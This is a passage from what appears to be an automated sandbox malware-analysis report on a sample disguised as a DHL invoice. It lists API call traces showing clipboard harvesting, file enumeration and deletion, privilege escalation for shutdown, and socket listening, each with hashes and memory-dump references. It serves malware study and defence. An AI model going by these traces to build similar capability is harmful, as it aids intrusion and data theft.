                                                                                                                          • Part of subcall function 003910BF: CloseHandle.KERNEL32(?,?,003911FC), ref: 003910E9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                        • String ID: $default$winsta0$Z?
                                                                                                                        • API String ID: 22674027-1168915105
                                                                                                                        • Opcode ID: f2cefc3a7dbab0c82014302d6b0e22fcab371265641e9af551bb9464bb46bd82
                                                                                                                        • Instruction ID: 1c43c8cd50b94dfa47795b87a2dd47e63585fc2eec4c31ef8b3326d562d0d6bb
                                                                                                                        • Opcode Fuzzy Hash: f2cefc3a7dbab0c82014302d6b0e22fcab371265641e9af551bb9464bb46bd82
                                                                                                                        • Instruction Fuzzy Hash: 2F818B7190020AAFEF229FA5DC49FEE7BB9EF08704F184129FA14F61A0C7319954CB20
                                                                                                                        Function 00390B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 003910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00391114
                                                                                                                          • Part of subcall function 003910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 00391120
                                                                                                                          • Part of subcall function 003910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 0039112F
                                                                                                                          • Part of subcall function 003910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00390B9B,?,?,?), ref: 00391136
                                                                                                                          • Part of subcall function 003910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0039114D
                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00390BCC
                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00390C00
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00390C17
                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00390C51
                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00390C6D
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00390C84
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00390C8C
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00390C93
                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00390CB4
                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00390CBB
                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00390CEA
                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00390D0C
                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00390D1E
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00390D45
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00390D4C
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00390D55
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00390D5C
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00390D65
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00390D6C
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00390D78
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00390D7F
                                                                                                                          • Part of subcall function 00391193: GetProcessHeap.KERNEL32(00000008,00390BB1,?,00000000,?,00390BB1,?), ref: 003911A1
                                                                                                                          • Part of subcall function 00391193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00390BB1,?), ref: 003911A8
                                                                                                                          • Part of subcall function 00391193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00390BB1,?), ref: 003911B7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4175595110-0
                                                                                                                        • Opcode ID: fe98da2956d33a20392d21ccc3817494a777b1dbb92b7143a1a32824ef19fd52
                                                                                                                        • Instruction ID: 9124ea8c7de129564b17392fe9250bcfef17763c0f886c2ed4d6ad8d3d73d61a
                                                                                                                        • Opcode Fuzzy Hash: fe98da2956d33a20392d21ccc3817494a777b1dbb92b7143a1a32824ef19fd52
                                                                                                                        • Instruction Fuzzy Hash: 2771587290021AAFDF16DFA5DC48FAEBBBCBF04304F054615E919E6291D771EA05CBA0
                                                                                                                        Function 003AEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • OpenClipboard.USER32(003CCC08), ref: 003AEB29
                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 003AEB37
                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 003AEB43
                                                                                                                        • CloseClipboard.USER32 ref: 003AEB4F
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 003AEB87
                                                                                                                        • CloseClipboard.USER32 ref: 003AEB91
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 003AEBBC
                                                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 003AEBC9
                                                                                                                        • GetClipboardData.USER32(00000001), ref: 003AEBD1
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 003AEBE2
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 003AEC22
                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000F), ref: 003AEC38
                                                                                                                        • GetClipboardData.USER32(0000000F), ref: 003AEC44
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 003AEC55
                                                                                                                        • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 003AEC77
                                                                                                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 003AEC94
                                                                                                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 003AECD2
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 003AECF3
                                                                                                                        • CountClipboardFormats.USER32 ref: 003AED14
                                                                                                                        • CloseClipboard.USER32 ref: 003AED59
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 420908878-0
                                                                                                                        • Opcode ID: 82130fe0ce43d044762da52469f652e50ba1c5662546efe4e3d8bbb1e0387665
                                                                                                                        • Instruction ID: bab2532d7984057a3522fbec8864975af97964e1b534fa44c0b70d3eb5d37218
                                                                                                                        • Opcode Fuzzy Hash: 82130fe0ce43d044762da52469f652e50ba1c5662546efe4e3d8bbb1e0387665
                                                                                                                        • Instruction Fuzzy Hash: 7D61F435208301AFD302EF24D899F2AB7A8EF85714F09555DF45ADB2A1CB31ED06CB62
                                                                                                                        Function 003A698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 003A69BE
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 003A6A12
                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003A6A4E
                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003A6A75
                                                                                                                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 003A6AB2
                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 003A6ADF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                        • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                        • API String ID: 3830820486-3289030164
                                                                                                                        • Opcode ID: b896ae42863568b97ec5f52bee3efd70a8a84cdaa7b90c64ca3a9cd5510e8fdb
                                                                                                                        • Instruction ID: 8a57dee008a88b93b18a58b5d539707f4d384203e835906b37b0f6105918e19f
                                                                                                                        • Opcode Fuzzy Hash: b896ae42863568b97ec5f52bee3efd70a8a84cdaa7b90c64ca3a9cd5510e8fdb
                                                                                                                        • Instruction Fuzzy Hash: 91D160B2508300AFC715EBA4C986EABB7ECEF89704F04491DF585DB191EB74DA44CB62
                                                                                                                        Function 003A9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 003A9663
                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 003A96A1
                                                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 003A96BB
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 003A96D3
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 003A96DE
                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 003A96FA
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003A974A
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(003F6B7C), ref: 003A9768
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 003A9772
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 003A977F
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 003A978F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 1409584000-438819550
                                                                                                                        • Opcode ID: f844ab44184a2a134b4b864076b12cfd988e8aa521e1c09a7fdee7f0efd0fb57
                                                                                                                        • Instruction ID: 7b63f622de64c7e50bc6dc2d29264e7d833c5ece09189830cdfc39f2a16236f9
                                                                                                                        • Opcode Fuzzy Hash: f844ab44184a2a134b4b864076b12cfd988e8aa521e1c09a7fdee7f0efd0fb57
                                                                                                                        • Instruction Fuzzy Hash: 4A31B0325002196ADF16AFB5EC09FEE77ACDF4A321F114596E909E21A0DB35ED448B20
                                                                                                                        Function 003A979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 003A97BE
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 003A9819
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 003A9824
                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 003A9840
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003A9890
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(003F6B7C), ref: 003A98AE
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 003A98B8
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 003A98C5
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 003A98D5
                                                                                                                          • Part of subcall function 0039DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0039DB00
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 2640511053-438819550
                                                                                                                        • Opcode ID: 1b904fd3367184ed3df09d9b16ebeaa27d77da3b71674caaeb9b99636db6ba51
                                                                                                                        • Instruction ID: cccf64afb31ad269354f530ffca349d700e7cf254e0a6db0ad1df614fd45c08a
                                                                                                                        • Opcode Fuzzy Hash: 1b904fd3367184ed3df09d9b16ebeaa27d77da3b71674caaeb9b99636db6ba51
                                                                                                                        • Instruction Fuzzy Hash: 0E31B0325002196ADF12EFA4EC49FEE77ACDF07320F118556E914F21A0DB39EE458B20
                                                                                                                        Function 003A8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 003A8257
                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 003A8267
                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003A8273
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003A8310
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003A8324
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003A8356
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 003A838C
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 003A8395
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 1464919966-438819550
                                                                                                                        • Opcode ID: cdb30c16dcb16c6f1c65dd6f974b67c548fb5a66077f92434091043b3aecda30
                                                                                                                        • Instruction ID: 7a1f713e16fdd48fdac93cb5a6bcedcfec8d0a3e69484e1e922ee2bec63d56a8
                                                                                                                        • Opcode Fuzzy Hash: cdb30c16dcb16c6f1c65dd6f974b67c548fb5a66077f92434091043b3aecda30
                                                                                                                        • Instruction Fuzzy Hash: 10615A765043459FDB11EF60C880AAEB3E8FF8A310F048D1AF989DB251DB35E945CB92
                                                                                                                        Function 0039D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00333AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00333A97,?,?,00332E7F,?,?,?,00000000), ref: 00333AC2
                                                                                                                          • Part of subcall function 0039E199: GetFileAttributesW.KERNEL32(?,0039CF95), ref: 0039E19A
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0039D122
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0039D1DD
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0039D1F0
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 0039D20D
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0039D237
                                                                                                                          • Part of subcall function 0039D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0039D21C,?,?), ref: 0039D2B2
                                                                                                                        • FindClose.KERNEL32(00000000,?,?,?), ref: 0039D253
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0039D264
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                        • String ID: \*.*
                                                                                                                        • API String ID: 1946585618-1173974218
                                                                                                                        • Opcode ID: 1f77eb1fdef988335781bfa278d74a02553c639826332c2e17ab73743540dc4f
                                                                                                                        • Instruction ID: fb75530b5c2a28def164653b4b8f5fdc007a45c2f66707c4c21e9511a569e8f8
                                                                                                                        • Opcode Fuzzy Hash: 1f77eb1fdef988335781bfa278d74a02553c639826332c2e17ab73743540dc4f
                                                                                                                        • Instruction Fuzzy Hash: 4D615F3180510D9FCF07EBE0DA929EDB779AF55300F248565E4467B191EB31AF09CB60
                                                                                                                        Function 003AED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1737998785-0
                                                                                                                        • Opcode ID: c043fda8aeab1f91e8ef3323119c1ccb09acc07bc037599c5d988d7134054a3f
                                                                                                                        • Instruction ID: 2f911999940646a056ec68223d75a779070f3f79345b436ed397cd3acd153cf4
                                                                                                                        • Opcode Fuzzy Hash: c043fda8aeab1f91e8ef3323119c1ccb09acc07bc037599c5d988d7134054a3f
                                                                                                                        • Instruction Fuzzy Hash: 2341AB35204611AFE722CF15D888F19BBE9EF45329F19D099E8199FA62C735FC42CB90
                                                                                                                        Function 0039E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 003916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0039170D
                                                                                                                          • Part of subcall function 003916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0039173A
                                                                                                                          • Part of subcall function 003916C3: GetLastError.KERNEL32 ref: 0039174A
                                                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 0039E932
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                        • String ID: $ $@$SeShutdownPrivilege
                                                                                                                        • API String ID: 2234035333-3163812486
                                                                                                                        • Opcode ID: a449b0de9da0fd621dc3e6f9bd7bdbc382fd4834fa73a4ac8b628799e15eeb6f
                                                                                                                        • Instruction ID: c2e17d0c84c03e6f0a958fae112cc67095678395240af6d6fb6edc9edea87847
                                                                                                                        • Opcode Fuzzy Hash: a449b0de9da0fd621dc3e6f9bd7bdbc382fd4834fa73a4ac8b628799e15eeb6f
                                                                                                                        • Instruction Fuzzy Hash: D601F973A20215AFEF56B6B49C86FBF726CA714751F150821FD13F61D1DBA96C408290
                                                                                                                        Function 003B1204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 003B1276
                                                                                                                        • WSAGetLastError.WSOCK32 ref: 003B1283
                                                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 003B12BA
                                                                                                                        • WSAGetLastError.WSOCK32 ref: 003B12C5
                                                                                                                        • closesocket.WSOCK32(00000000), ref: 003B12F4
                                                                                                                        • listen.WSOCK32(00000000,00000005), ref: 003B1303
                                                                                                                        • WSAGetLastError.WSOCK32 ref: 003B130D
                                                                                                                        • closesocket.WSOCK32(00000000), ref: 003B133C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 540024437-0
                                                                                                                        • Opcode ID: 75768b99e8851c2092ea8121c1505d3f265da7cc80f175cc8a3594443e3c7fd2
                                                                                                                        • Instruction ID: 66726eae312b8e71625800625603e258c26f4c849bff496a15be40cf504bd067
                                                                                                                        • Opcode Fuzzy Hash: 75768b99e8851c2092ea8121c1505d3f265da7cc80f175cc8a3594443e3c7fd2
                                                                                                                        • Instruction Fuzzy Hash: 0941D435A002009FD711DF24C494B6ABBE5BF46318F598488D95A8F6D2C731FD81CBE0
                                                                                                                        Function 0036B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 0036B9D4
                                                                                                                        • _free.LIBCMT ref: 0036B9F8
                                                                                                                        • _free.LIBCMT ref: 0036BB7F
                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,003D3700), ref: 0036BB91
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0040121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0036BC09
